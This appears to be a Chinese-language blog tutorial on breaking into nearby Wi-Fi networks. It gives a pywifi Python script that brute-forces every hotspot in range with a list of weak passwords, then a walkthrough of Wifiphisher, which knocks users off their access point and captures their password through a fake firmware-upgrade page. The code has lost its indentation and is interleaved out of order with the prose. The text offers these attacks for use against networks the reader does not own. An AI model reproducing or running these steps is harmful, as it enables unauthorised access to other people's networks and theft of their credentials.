from pywifi import *
import time
import sys
如果您想要免费获取学习教程,可以加入我们的微信群或QQ群。在微信公众号的底部菜单中,您可以找到教程列表。如果您想要进行WIFI破解,使用Python和字典是必不可少的。破解热点的关键在于弱口令。您可以自己创建一个强大的字典,字典的强大程度决定了您可以破解的WIFI数量。
方法一:环境准备
首先,导入所需的模块。在这个例子中,我们只需要使用三个模块。在pywifi的wifiutillinux.py脚本中的sendcmdtowpas方法中,我们需要修改if reply != b’OK ‘的判断条件,以避免出现过多的提示信息。
12345678
123456789
88888888
1234567890
00000000
87654321
66668888
11223344
147258369
11111111
def main():
#扫描时常
scantimes = 3
#单个密码测试延迟
testtimes = 15
output = sys.stdout
#结果文件保存路径
files = "TestRes.txt"
#字典列表
keys = open(sys.argv[1],"r").readlines()
print "|KEYS %s"%(len(keys))
#实例化一个pywifi对象
wifi = PyWiFi()
#选择定一个网卡并赋值于iface
iface = wifi.interfaces()[0]
#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres = scans(iface,scantimes)
#统计附近被发现的热点数量
nums = len(scanres)
print "|SCAN GET %s"%(nums)
print "%s %-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s %s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)
#将每一个热点信息逐一进行测试
for i,x in enumerate(scanres):
#测试完毕后,成功的结果讲存储到files中
res = test(nums-i,iface,x,keys,output,testtimes)
if res:
open(files,"a").write(res)
准备字典
我们随机创建了一个包含十个常见的弱口令的WIFI字典。
配置扫描器
我们建议将扫描时间设置在15-20秒之间。测试时间可以根据需要自定义。考虑到认证速度和距离的关系,我通常将测试时间设置为15秒左右。如果时间太长,即使成功破解了热点,信号也可能不太好。
def scans(face,timeout):
#开始扫描
face.scan()
time.sleep(timeout)
#在若干秒后获取扫描结果
return face.scan_results()
def test(i,face,x,key,stu,ts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid
#迭代字典并进行爆破
for n,k in enumerate(key):
x.key = k.strip()
#移除所有热点配置
face.remove_all_network_profiles()
#讲封装好的目标尝试连接
face.connect(face.add_network_profile(x))
#初始化状态码,考虑到用0会发生些逻辑错误
code = 10
t1 = time.time()
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
while code!=0 :
time.sleep(0.1)
code = face.status()
now = time.time()-t1
if now>ts:
break
stu.write(" %-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace(" ","")))
stu.flush()
if code == 4:
face.disconnect()
return "%-*s| %s | %*s |%*s "%(20,x.ssid,x.bssid,3,x.signal,15,k)
return False
扫描周围的热点
进行热点扫描。
热点测试
在这个案例中,我们使用了11个弱口令,并扫描到了20个热点。接下来,我们将开始破解这些热点。
方法二:更快速的破解方法
目前常见的Wi-Fi加密方式有WEP、WPA2和WPS。然而,有些用户反映破解WPA2的方法耗时太长,并且不适用于所有启用了WPS的接入点。现在,我将介绍一种更省时省力的方法。
主要原理
我们将使用Wifiphisher这个优化过的自动化脚本,而不是之前的脚本(如Airsnarf)。Wifiphisher比前者更加方便。
要完成上述任务,您需要Kali Linux和两个无线适配器,其中一个必须支持数据包注入。
第一步:下载Wifiphisher
您可以下载已解压的Wifiphisher源代码,如下图所示。
当然,如果您懒得下载,也可以复制GitHub上的代码。
第二步:导航到目录
接下来,导航到解压后的Wifiphisher目录。在这个例子中,目录路径是/wifiphisherWi-Fi1.1。
当您看到目录内容时,您会看到wifiphisher.py脚本。
kali > python wifiphisher.py
第三步:运行脚本
您可以输入以下脚本来运行。
请注意,如果您是第一次运行脚本,可能会提示您安装hostpad。键入Y继续安装即可。完成后,再次运行Wifiphisher脚本。这次将运行8080和43端口的Web服务器,并开始搜索附近的Wi-Fi网络。
等待搜索完成,您会看到一系列Wi-Fi网络名称。我们的目标是最下方的wonderhowto。
第四步:获取密码
按下Ctrl+C,然后键入要复制的AP数。在这个例子中,我们选择了12。
按下回车,Wifiphisher将显示以下结果,显示正在使用的界面以及被攻击和复制的AP的SSID。
目标用户已取消验证他们的AP,随后会出现一个固件升级的信息,要求他们重新验证。一旦重新验证,他们接入的就是伪造的接入点。当用户输入密码时,它会通过Wifiphisher的开放终端传输给您。然后,他们会像往常一样上网,毫不知情,而您已经获得了密码。